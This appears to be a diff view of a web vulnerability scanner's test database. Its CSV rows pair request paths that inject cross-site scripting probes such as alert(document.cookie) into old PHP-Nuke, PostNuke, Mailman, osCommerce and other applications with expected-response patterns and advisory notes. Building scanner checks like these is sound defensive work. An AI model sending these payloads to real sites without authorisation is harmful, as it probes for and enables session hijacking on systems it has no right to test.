CA-2000-02.","",""855 "000833","3931","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","<script>alert ('Vulnerable)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""856 "000834","3931","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET"," [script]alert(document.cookie)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""857 "000835","3931","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","<script>alert (document.cookie)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""858 "000836","0","4","/myhome.php?action=messages&box=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""859 "000837","0","4","/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""860 "000838","0","4","/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""861 "000839","0","4","/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""862 "000840","50539","4","/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie)","","","","","Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""863 "000841","0","4","/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""864 "000842","0","4","/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""865 "000843","0","4","/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""866 "000844","0","4","/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""867 "000845","0","4","/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""868 "000846","0","4","/modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2","GET","<script>alert ('Vulnerable')</script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""869 "000847","5498","4","/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""870 "000848","0","4","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""871 "000849","0","4","/modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""872 "000850","0","4","/modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""873 "000851","0","4","/modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""874 "000852","0","4","/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0","GET","javascript:alert (document.cookie)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""875 "000853","20235","4","/modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""876 "000854","5506","4","/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|","GET","<script>alert (document.cookie)","","","","","PostNuke CMS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""877 "000855","0","4","/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""878 "000856","0","4","/modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""879 "000857","0","4","/modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""880 "000858","6226","4","/modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""881 "000859","6226","4","/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""882 "000860","5914","4","/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""883 "000861","0","4","/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""884 "000862","0","4","/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index","GET","javascript:alert (document.cookie);","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""885 "000863","4598","4","/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22","GET","alert ('Vulnerable')","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""886 "000864","3201","4","/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Megabook guestbook is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""887 "000865","0","4","/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>","GET","<SCRIPT>alert ('Vulnerable')</SCRIPT>","","","","","Mailman 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""888 "000866","0","4","/mailman/listinfo/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02.","",""889 "000867","2895","4","/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>","GET","<script>alert (\"Vulnerable\")</script>","","","","","IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.","",""890 "000868","9256","4","/launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.","",""891 "000869","9257","4","/launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.","",""850 "000828","2767","4","/openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script>","GET","<script>alert\(document\.domain\)<\/script>","","","","","OpenAutoClassifieds 1.x is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 851 "000829","0","4","/node/view/666\"><script>alert(document.domain)</script>","GET","<script>alert\(document\.domain\)<\/script>","","","","","Drupal 4.2.0 RC is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 852 "000830","5106","4","/netutils/whodata.stm?sitename=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 853 "000831","0","4","/nav/cList.php?root=</script><script>alert('Vulnerable')/<script>","GET","<script>alert\('Vulnerable'\)\/<script>","","","","","RaQ3 server script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 854 "000832","3931","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","\[script\]alert\('Vulnerable\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 855 "000833","3931","4","/myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query=","GET","<script>alert\('Vulnerable\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 856 "000834","3931","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","\[script\]alert\(document\.cookie\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 857 "000835","3931","4","/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent","GET","<script>alert\(document\.cookie\)","","","","","myphpnuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 858 "000836","0","4","/myhome.php?action=messages&box=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","OpenBB 1.0.0 RC3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 859 "000837","0","4","/msadm/user/login.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site User login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 860 "000838","0","4","/msadm/site/index.php3?authid=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site Administrator Login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 861 "000839","0","4","/msadm/domain/index.php3?account_name=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The Sendmail Server Site Domain Administrator login is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 862 "000840","50539","4","/modules/Submit/index.php?op=pre&title=<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)","","","","","Basit cms 1.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 863 "000841","0","4","/modules/Forums/bb_smilies.php?site_font=}--></style><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 864 "000842","0","4","/modules/Forums/bb_smilies.php?name=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 865 "000843","0","4","/modules/Forums/bb_smilies.php?Default_Theme=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 866 "000844","0","4","/modules/Forums/bb_smilies.php?bgcolor1=\"><script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PHP-Nuke 6.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 867 "000845","0","4","/modules.php?op=modload&name=Xforum&file=member&action=viewpro&member=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 868 "000846","0","4","/modules.php?op=modload&name=Xforum&file=<script>alert('Vulnerable')</script>&fid=2","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The XForum (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 869 "000847","5498","4","/modules.php?op=modload&name=Wiki&file=index&pagename=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Wiki PostNuke Module is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 870 "000848","0","4","/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 871 "000849","0","4","/modules.php?op=modload&name=WebChat&file=index&roomid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 872 "000850","0","4","/modules.php?op=modload&name=Members_List&file=index&letter=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke's modules.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 873 "000851","0","4","/modules.php?op=modload&name=Guestbook&file=index&entry=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 874 "000852","0","4","/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(document.cookie);%3E&parent_id=0","GET","javascript:alert\(document\.cookie\)","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 875 "000853","20235","4","/modules.php?op=modload&name=DMOZGateway&file=index&topic=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The DMOZGateway (PHP-Nuke Add-on module) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 876 "000854","5506","4","/modules.php?op=modload&name=books&file=index&req=search&query=|script|alert(document.cookie)|/script|","GET","<script>alert\(document\.cookie\)","","","","","PostNuke CMS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 877 "000855","0","4","/modules.php?name=Your_Account&op=userinfo&username=bla<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Francisco Burzi PHP-Nuke 5.6, 6.0, 6.5 RC1/RC2/RC3, 6.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 878 "000856","0","4","/modules.php?name=Your_Account&op=userinfo&uname=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 879 "000857","0","4","/modules.php?name=Surveys&pollID=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 880 "000858","6226","4","/modules.php?name=Stories_Archive&sa=show_month&year=<script>alert('Vulnerable')</script>&month=3&month_l=test","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 881 "000859","6226","4","/modules.php?name=Stories_Archive&sa=show_month&year=2002&month=03&month_l=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 882 "000860","5914","4","/modules.php?name=Downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This install of PHP-Nuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 883 "000861","0","4","/modules.php?name=Classifieds&op=ViewAds&id_subcatg=75&id_catg=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","The PHP-Nuke forum is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 884 "000862","0","4","/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index","GET","javascript:alert\(document\.cookie\);","","","","","Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 885 "000863","4598","4","/members.asp?SF=%22;}alert('Vulnerable');function%20x(){v%20=%22","GET","alert\('Vulnerable'\)","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 886 "000864","3201","4","/megabook/admin.cgi?login=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Megabook guestbook is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 887 "000865","0","4","/mailman/options/yourlist?language=en&email=<SCRIPT>alert('Vulnerable')</SCRIPT>","GET","<SCRIPT>alert\('Vulnerable'\)<\/SCRIPT>","","","","","Mailman 2.1 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 888 "000866","0","4","/mailman/listinfo/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02.","","" 889 "000867","2895","4","/ldap/cgi-bin/ldacgi.exe?Action=<script>alert(\"Vulnerable\")</script>","GET","<script>alert\(\"Vulnerable\"\)<\/script>","","","","","IBM Directory Server 4.1 Web Admin, ldacgi.exe is vulnerable to XSS attack.","","" 890 "000868","9256","4","/launch.jsp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.","","" 891 "000869","9257","4","/launch.asp?NFuse_Application=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","NFuse is vulnerable to cross site scripting (XSS) in the GetLastError function. Upgrade to the latest version. CA-2000-02.","","" 892 892 "000870","4015","4","/jigsaw/","GET","200","","","","","Jigsaw server may be installed. Versions lower than 2.2.1 are vulnerable to Cross Site Scripting (XSS) in the error page.","","" 893 "000872","5803","4","/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""894 "000873","2739","4","/index.php?top_message=<script>alert(document.cookie)</script> ","GET","<script>alert (document.cookie)</script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""895 "000874","50552","4","/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable');</script>","","","","","Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""896 "000875","0","4","/index.php?catid=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""897 "000876","0","4","/index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.","",""898 "000877","0","4","/index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >","GET","<script>alert ('Vulnerable')</script>","","","","","MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""899 "000878","0","4","/index.php/\"><script><script>alert(document.cookie)</script><","GET","<script>alert (document.cookie)</script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","",""900 "000879","50553","4","/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","",""901 "000880","50553","4","/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","GET","<script>alert (document.cookie)</script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","",""902 "000881","17160","4","/include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script>","GET","<script>alert (document.cookie)</script>","","","","","PHPKIT is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""903 "000882","0","4","/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie);</script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""904 "000883","0","4","/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert (document.cookie);</script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""905 "000884","0","4","/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""893 "000872","5803","4","/isapi/testisa.dll?check1=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 894 "000873","2739","4","/index.php?top_message=<script>alert(document.cookie)</script> ","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 895 "000874","50552","4","/index.php?file=Liens&op=\"><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 896 "000875","0","4","/index.php?catid=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","PostNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 897 "000876","0","4","/index.php?action=storenew&username=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.","","" 898 "000877","0","4","/index.php?action=search&searchFor=\"><script>alert('Vulnerable')</script >","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","MiniBB http://www.minibb.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 899 "000878","0","4","/index.php/\"><script><script>alert(document.cookie)</script><","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","","" 900 "000879","50553","4","/index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","","" 901 "000880","50553","4","/index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search","GET","<script>alert\(document\.cookie\)<\/script>","","","","","eZ publish v3 and prior allow Cross Site Scripting (XSS). CA-2000-02.","","" 902 "000881","17160","4","/include.php?path=contact.php&contact_email=\"><script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","PHPKIT is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 903 "000882","0","4","/html/partner.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 904 "000883","0","4","/html/chatheader.php?mainfile=anything&Default_Theme='<script>alert(document.cookie);</script>","GET","<script>alert\(document\.cookie\);<\/script>","","","","","myphpnuke version 1.8.8_final_7 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 905 "000884","0","4","/html/cgi-bin/cgicso?query=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 906 906 "000885","2754","4","/guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E","GET","200","","","","","MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.","","" 907 "000886","2322","4","/gallery/search.php?searchstring=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.","",""908 "000887","20234","4","/friend.php?op=SiteSent&fname=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This version of PHP-Nuke's friend.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""909 "000888","2946","4","/forum_members.asp?find=%22;}alert('Vulnerable');function%20x(){v%20=%22","GET","alert ('Vulnerable')","","","","","Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""910 "000889","2739","4","/forums/index.php?top_message=<script>alert(document.cookie)</script> ","GET","<script>alert (document.cookie)<script>","","","","","Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""911 "000890","31694","4","/forums/index.php?board=;action=login2&user=USERNAME&cookielength=120&passwrd=PASSWORD<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","YaBB is vulnerable to Cross Site Scripting (XSS) in the password field of the login page. CA-2000-02.","",""912 "000891","5043","4","/forums/browse.php?fid=3&tid=46&go=<script>JavaScript:alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","php(Reactor) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""913 "000892","2530","4","/esp?PAGE=<script>alert(document.cookie)</script>","GET","<script>alert (document.cookie)</script>","","","","","Escapade Scripting Engine is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""914 "000893","9231","4","/error/500error.jsp?et=1<script>alert('Vulnerable')</script>;","GET","<script>alert ('Vulnerable')</script>","","","","","Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02.","",""915 "000894","59095","4","/downloads/pafiledb.php?action=rate&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert ('Vulnerable')</script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""916 "000895","59095","4","/downloads/pafiledb.php?action=email&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert ('Vulnerable')</script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""917 "000896","59095","4","/downloads/pafiledb.php?action=download&id=4?\"<script>alert('Vulnerable')</script>\"","GET","<script>alert ('Vulnerable')</script>","","","","","Pafiledb by PHP Arena is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""918 "000897","0","4","/download.php?sortby=&dcategory=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","This version of PHP-Nuke's download.php is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. CA-2000-02.","",""919 "000898","0","4","/default.php?info_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window .alert(document.cookie);</script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""920 "000899","0","4","/default.php?error_message=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E","GET","<script language=javascript>window .alert(document.cookie);</script>","","","","","osCommerce is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""921 "000900","5043","4","/comments/browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""922 